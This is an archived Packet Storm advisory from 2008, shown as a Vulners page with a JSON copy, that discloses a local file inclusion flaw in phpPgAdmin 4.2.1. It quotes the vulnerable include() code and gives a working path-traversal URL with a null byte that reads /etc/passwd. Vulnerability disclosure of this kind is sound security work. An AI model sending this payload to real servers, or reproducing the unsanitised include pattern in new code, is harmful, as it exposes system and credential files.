Search...

phpPgAdmin 4.2.1 Local File Inclusion

2008-12-09T00:00:00

ID PACKETSTORM:72700
Type packetstorm
Reporter dun
Modified 2008-12-09T00:00:00

Description

                                        
                                            ` :::::::-. ... ::::::. :::.  
;;, `';, ;; ;;;`;;;;, `;;;  
`[[ [[[[' [[[ [[[[[. '[[  
$$, $$$$ $$$ $$$ "Y$c$$  
888_,o8P'88 .d888 888 Y88  
MMMMP"` "YmmMMMM"" MMM YM  
  
[ Discovered by dun \ dun[at]strcpy.pl ]  
  
##################################################################  
# [ phpPgAdmin &lt;= 4.2.1 ] Local File Inclusion Vulnerability #  
##################################################################  
#  
# Script: "phpPgAdmin is a web-based administration tool for PostgreSQL. It is perfect for PostgreSQL DBAs, newbies and hosting services."  
#  
# Script site: http://www.phppgadmin.org/  
# Download: http://phppgadmin.sourceforge.net/?page=download  
#  
# Vuln: http://site.com/phpPgAdmin/index.php?_language=../../../../../../../../etc/passwd%00  
#  
# Bug: ./phpPgAdmin-4.2.1/index.php (line: 11)  
#  
# ...  
# include_once('./libraries/lib.inc.php');  
# ...   
#  
#  
# Bug: ./phpPgAdmin-4.2.1/libraries/lib.inc.php (lines: 22-138 -&gt; 136)  
#  
# ...  
# // Determine language file to import:  
# // 1. Check for the language from a request var  
# if (isset($_REQUEST['language']) && isset($appLangFiles[$_REQUEST['language']]))  
# $_language = $_REQUEST['language'];   
#  
# // 2. Check for language session var  
# if (!isset($_language) && isset($_SESSION['webdbLanguage']) && isset($appLangFiles[$_SESSION['webdbLanguage']])) {  
# $_language = $_SESSION['webdbLanguage'];  
# }  
#  
# // 3. Check for acceptable languages in HTTP_ACCEPT_LANGUAGE var  
# if (!isset($_language) && $conf['default_lang'] == 'auto' && isset($_SERVER['HTTP_ACCEPT_LANGUAGE'])) {  
# // extract acceptable language tags  
# // (http://www.w3.org/Protocols/rfc2616/rfc2616-sec14.html#sec14.4)  
# preg_match_all('/\s*([a-z]{1,8}(?:-[a-z]{1,8})*)(?:;q=([01](?:.[0-9]{0,3})?))?\s*(?:,|$)/', strtolower($_SERVER['HTTP_ACCEPT_LANGUAGE']), $_m, PREG_SET_ORDER);  
# foreach($_m as $_l) { // $_l[1] = language tag, [2] = quality  
# if (!isset($_l[2])) $_l[2] = 1; // Default quality to 1  
# if ($_l[2] &gt; 0 && $_l[2] &lt;= 1 && isset($availableLanguages[$_l[1]])) {  
# // Build up array of (quality =&gt; language_file)  
# $_acceptLang[$_l[2]] = $availableLanguages[$_l[1]];  
# }  
# }  
# unset($_m);  
# unset($_l);  
# if (isset($_acceptLang)) {  
# // Sort acceptable languages by quality  
# krsort($_acceptLang, SORT_NUMERIC);  
# $_language = reset($_acceptLang);  
# unset($_acceptLang);  
# }  
# }   
#  
# // 4. Otherwise resort to the default set in the config file  
# if (!isset($_language) && $conf['default_lang'] != 'auto' && isset($appLangFiles[$conf['default_lang']])) {  
# $_language = $conf['default_lang'];  
# }  
#  
# // Import the language file  
# if (isset($_language)) {  
# include("./lang/recoded/{$_language}.php"); // * LFI *  
# $_SESSION['webdbLanguage'] = $_language;  
# }  
# ...   
#  
#  
###############################################  
# Greetz: D3m0n_DE * str0ke * and otherz..  
###############################################  
  
[ dun / 2008 ]   
  
*******************************************************************************************  
  
`

JSON Vulners Source

Initial Source

{"id": "PACKETSTORM:72700", "type": "packetstorm", "bulletinFamily": "exploit", "title": "phpPgAdmin 4.2.1 Local File Inclusion", "description": "", "published": "2008-12-09T00:00:00", "modified": "2008-12-09T00:00:00", "cvss": {"vector": "NONE", "score": 0.0}, "href": "https://packetstormsecurity.com/files/72700/phpPgAdmin-4.2.1-Local-File-Inclusion.html", "reporter": "dun", "references": [], "cvelist": [], "lastseen": "2016-11-03T10:22:12", "viewCount": 3, "enchantments": {"score": {"value": -0.4, "vector": "NONE", "modified": "2016-11-03T10:22:12", "rev": 2}, "dependencies": {"references": [], "modified": "2016-11-03T10:22:12", "rev": 2}, "vulnersScore": -0.4}, "sourceHref": "https://packetstormsecurity.com/files/download/72700/phppgadmin-lfi.txt", "sourceData": "` :::::::-. ... ::::::. :::. \n;;, `';, ;; ;;;`;;;;, `;;; \n`[[ [[[[' [[[ [[[[[. '[[ \n$$, $$$$ $$$ $$$ \"Y$c$$ \n888_,o8P'88 .d888 888 Y88 \nMMMMP\"` \"YmmMMMM\"\" MMM YM \n \n[ Discovered by dun \\ dun[at]strcpy.pl ] \n \n################################################################## \n# [ phpPgAdmin <= 4.2.1 ] Local File Inclusion Vulnerability # \n################################################################## \n# \n# Script: \"phpPgAdmin is a web-based administration tool for PostgreSQL. It is perfect for PostgreSQL DBAs, newbies and hosting services.\" \n# \n# Script site: http://www.phppgadmin.org/ \n# Download: http://phppgadmin.sourceforge.net/?page=download \n# \n# Vuln: http://site.com/phpPgAdmin/index.php?_language=../../../../../../../../etc/passwd%00 \n# \n# Bug: ./phpPgAdmin-4.2.1/index.php (line: 11) \n# \n# ... \n# include_once('./libraries/lib.inc.php'); \n# ... \n# \n# \n# Bug: ./phpPgAdmin-4.2.1/libraries/lib.inc.php (lines: 22-138 -> 136) \n# \n# ... \n# // Determine language file to import: \n# // 1. Check for the language from a request var \n# if (isset($_REQUEST['language']) && isset($appLangFiles[$_REQUEST['language']])) \n# $_language = $_REQUEST['language']; \n# \n# // 2. Check for language session var \n# if (!isset($_language) && isset($_SESSION['webdbLanguage']) && isset($appLangFiles[$_SESSION['webdbLanguage']])) { \n# $_language = $_SESSION['webdbLanguage']; \n# } \n# \n# // 3. Check for acceptable languages in HTTP_ACCEPT_LANGUAGE var \n# if (!isset($_language) && $conf['default_lang'] == 'auto' && isset($_SERVER['HTTP_ACCEPT_LANGUAGE'])) { \n# // extract acceptable language tags \n# // (http://www.w3.org/Protocols/rfc2616/rfc2616-sec14.html#sec14.4) \n# preg_match_all('/\\s*([a-z]{1,8}(?:-[a-z]{1,8})*)(?:;q=([01](?:.[0-9]{0,3})?))?\\s*(?:,|$)/', strtolower($_SERVER['HTTP_ACCEPT_LANGUAGE']), $_m, PREG_SET_ORDER); \n# foreach($_m as $_l) { // $_l[1] = language tag, [2] = quality \n# if (!isset($_l[2])) $_l[2] = 1; // Default quality to 1 \n# if ($_l[2] > 0 && $_l[2] <= 1 && isset($availableLanguages[$_l[1]])) { \n# // Build up array of (quality => language_file) \n# $_acceptLang[$_l[2]] = $availableLanguages[$_l[1]]; \n# } \n# } \n# unset($_m); \n# unset($_l); \n# if (isset($_acceptLang)) { \n# // Sort acceptable languages by quality \n# krsort($_acceptLang, SORT_NUMERIC); \n# $_language = reset($_acceptLang); \n# unset($_acceptLang); \n# } \n# } \n# \n# // 4. Otherwise resort to the default set in the config file \n# if (!isset($_language) && $conf['default_lang'] != 'auto' && isset($appLangFiles[$conf['default_lang']])) { \n# $_language = $conf['default_lang']; \n# } \n# \n# // Import the language file \n# if (isset($_language)) { \n# include(\"./lang/recoded/{$_language}.php\"); // * LFI * \n# $_SESSION['webdbLanguage'] = $_language; \n# } \n# ... \n# \n# \n############################################### \n# Greetz: D3m0n_DE * str0ke * and otherz.. \n############################################### \n \n[ dun / 2008 ] \n \n******************************************************************************************* \n \n`\n", "immutableFields": []}